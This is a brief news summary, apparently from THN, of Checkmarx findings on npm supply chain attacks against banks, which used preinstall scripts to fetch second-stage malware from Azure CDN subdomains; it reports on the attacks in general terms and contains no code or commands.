"Banking Sector Targeted in Open-Source Software Supply Chain Attacks"
Researchers have found what they say are the first open source software supply chain attacks that specifically target the banking sector. Checkmarx noted that these attacks exhibited sophisticated techniques, including targeting specific components in the victim bank's web assets by attaching malicious functionalities. In order to appear credible, the attackers created a fake LinkedIn profile and customized command-and-control (C2) centers for each target, exploiting legitimate services for malicious activities. The npm packages have been reported and taken down. In the first attack, the malware author posed as an employee of the target bank and uploaded packages to the npm registry in early April 2023. The modules included a preinstall script for activating the infection sequence. When launched, the script determined the host operating system and downloaded a second-stage malware from a remote server by using a subdomain on Azure that contained the name of the bank. Checkmarx researchers say the perpetrator used Azure's CDN subdomains to effectively deliver the second-stage payload. Due to Azure's status as a legitimate service, this tactic is clever as it circumvents traditional deny list methods. This article continues to discuss the open source software supply chain attacks targeting the banking sector.
THN reports "Banking Sector Targeted in Open-Source Software Supply Chain Attacks"